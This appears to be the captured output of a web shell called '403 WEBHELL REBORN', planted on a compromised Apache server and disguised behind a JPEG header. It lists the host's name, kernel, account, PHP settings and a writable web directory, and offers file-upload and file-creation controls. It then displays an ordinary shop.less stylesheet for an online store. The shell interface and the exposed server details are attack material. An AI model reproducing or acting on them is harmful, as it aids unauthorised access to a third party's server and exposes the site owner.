ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache/2
System : Linux srv244.medyabim.com 4.18.0-553.89.1.el8_10.x86_64 #1 SMP Mon Dec 8 03:53:08 EST 2025 x86_64
User : lionbursa ( 1773)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Directory :  /home/lionbursa/public_html/style/less/less-mobilerepair/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /home/lionbursa/public_html/style/less/less-mobilerepair/shop.less
/*
 * shop.less
 * -----------------------------------------------
*/

/* -------- Product Details Page ---------- */
.product {
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 30px;
	position: relative;
}
.products .product {
	border: 1px solid #eee;
	&:hover {
		border: 1px solid #eee;
	}
}

.btn-add-to-cart-wrapper {  
}
.product:hover .btn-add-to-cart-wrapper {
}

/* -------- Price ---------- */
.product {
	.price {
		color: #333038;
		font-size: 15px;
		font-weight: 500;
		padding: 5px 0 15px;

		del {
			color: #9e9d9e;
			font-size: 13px;
			margin-right: 5px;
		}
		ins {
			color: @black-333;
			font-size: 16px;
			text-decoration: none;
		}
		ins, ins {
			background: rgba(0, 0, 0, 0) none repeat scroll 0 0;
			font-weight: 600;
		}
	}
}

/* -------- Product-Summary ---------- */

.product {
	.product-summary {
		.product-title {
			margin-top: 0;
		}
		.short-description {
			margin-bottom: 15px;
		}
		.cart-form-wrapper .btn {
			margin-top: 0;
		}
		.variations {
			width: 100%;
		}
	}

	.product-tab {
		margin-top: 30px;
	}
	.commentlist {
		.comment {
			margin-top: 30px;
			position: relative;
			.meta {
				font-size: 12px;
			}
			.author {
				font-size: 14px;
				font-weight: bold;
			}
		}
	}

	.product-thumb {
		position: relative;
		&:hover .overlay {
			opacity: 1;
		}
		.overlay .add-to-wishlist {
			color: #fff;
			right: 10px;
			top: 10px;
			position: absolute;
		}	
	}
}

.product .product-summary .cart-form-wrapper .quantity, .tbl-shopping-cart .quantity {
	display: inline-block;
	margin-right: .8571em;
	position: relative;
	width: 4.1429em;
	vertical-align: top;

	.minus, 
	.plus {
		background: none repeat scroll 0 0 transparent;
		border: 1px solid #ccc;
		border-radius: 3px;
		font-family: 'Open Sans', sans-serif;
		height: 18px;
		left: 3em;
		line-height: 1;
		outline: medium none;
		padding: 0;
		position: absolute;
		width: 18px;
	}
	.minus {
		bottom: 0;
	}
	.plus {
		top: 0;
	}
	.qty {
		-moz-appearance: textfield;
		border: 1px solid #ccc;
		height: 41px;
		padding-left: 0;
		padding-right: 0;
		text-align: center;
		width: 40px;
	}
}

/* -------- Star-Rating ---------- */
.star-rating {
	font-size: 14px;
	height: 16px;
	line-height: 1;
	margin: 0 auto;
	overflow: hidden;
	position: relative;
	top: 5px;
	width: 75px;
	&::before, 
	span::before {
			color: @gray-darkgray;
			content: "";
			float: left;
			font-family: fontawesome;
			left: 0;
			letter-spacing: 2px;
			position: absolute;
			top: 0;
	}
	span {
			float: left;
			left: 0;
			overflow: hidden;
			padding-top: 1.5em;
			position: absolute;
			top: 0;
	}
}

/* -------- Tag Sale ---------- */
.product .tag-sale {
    margin: 0;
    top: 0;
    display: block;
    left: auto;
    right: 0;
	.transition(400ms);
    color: #fff;
    font-size: 13px;
    font-weight: 600;
    line-height: 18px;
    padding: 4px 10px 4px 16px;
    position: absolute;
    text-align: right;
    text-transform: uppercase;
    z-index: 9;

	.tag-sale::before {
	  border-color: transparent transparent transparent #ddd;
	  border-style: solid;
	  border-width: 12px 13px 13px 8px;
	  content: "";
	  height: 0;
	  left: 0;
	  pointer-events: none;
	  position: absolute;
	  top: 1px;
	  width: 0;
	}
}

/* -------- Cart Page ---------- */
.tbl-shopping-cart {
	.product-thumbnail img {
		max-width: 72px;
		max-height: 72px;
	}
	.product-remove {
		text-align: center;
	}
	.variation .variation-size, 
	.variation .variation-size span {
		font-size: 12px;
	}
	tr th, 
	tr td, 
	.coupon label, 
	.coupon input, 
	.coupon button {
		vertical-align: middle;
	}
	tr td {
		padding: 10px 12px;
	}
}


table.no-border td {
    border: none ;
}

/* -------- Checkout Page ---------- */
.payment-method {
	.radio {
		border: 1px solid #eee;
		padding: 10px;
		> label {
			color: #111;
			font-size: 17px;
		}
		input {
			margin-top: 8px;
			vertical-align: initial;
		}
		> p {
			margin-left: 20px;
		}
	}
}
#checkout-shipping-address {
	display: none;
}


/* -------- Top Nav Search And Cart ---------- */
.top-nav-search-box, .top-nav-cart-box {
	.indicator {
		display: none;
	}
}
.dropdown-cart {
	padding: 10px;

	.cart-table-list,
	.cart-table-list i{
	    color: #222;
	    border: none;
	}
	.cart-table-list {

		a {
		    line-height: normal;
		    color: #222;
		}
		td img {
		    width: 50px;
		    height: auto;
		}
		&.table>tbody>tr>td {
		    border: none;
		    line-height: 20px;
		    height: 20px;
		    vertical-align: middle;
		}
	}

	.total-cart {
	    display: inline-block;
	    width: 100%;
	    padding-top: 20px;
	    color: #222;
	    text-align: right;
		ul {
		    float: right;
		    list-style: none;
		    padding: 0;
		    width: 100%;
			li{
			    display: block;
			    overflow: hidden;
				span {
				    width: 100px;
				    display: inline-block;
				    text-align: right;
				    white-space: nowrap;
				}
			}
		}
		.table > tbody > tr > td, .table > tbody > tr > th, .table > tfoot > tr > td, .table > tfoot > tr > th, .table > thead > tr > td, .table > thead > tr > th {
			border: 0;
		}
	}
	.cart-btn .btn {
		width: auto;
		float: none;
		padding: 5px 15px;
	}
}

Anon7 - 2021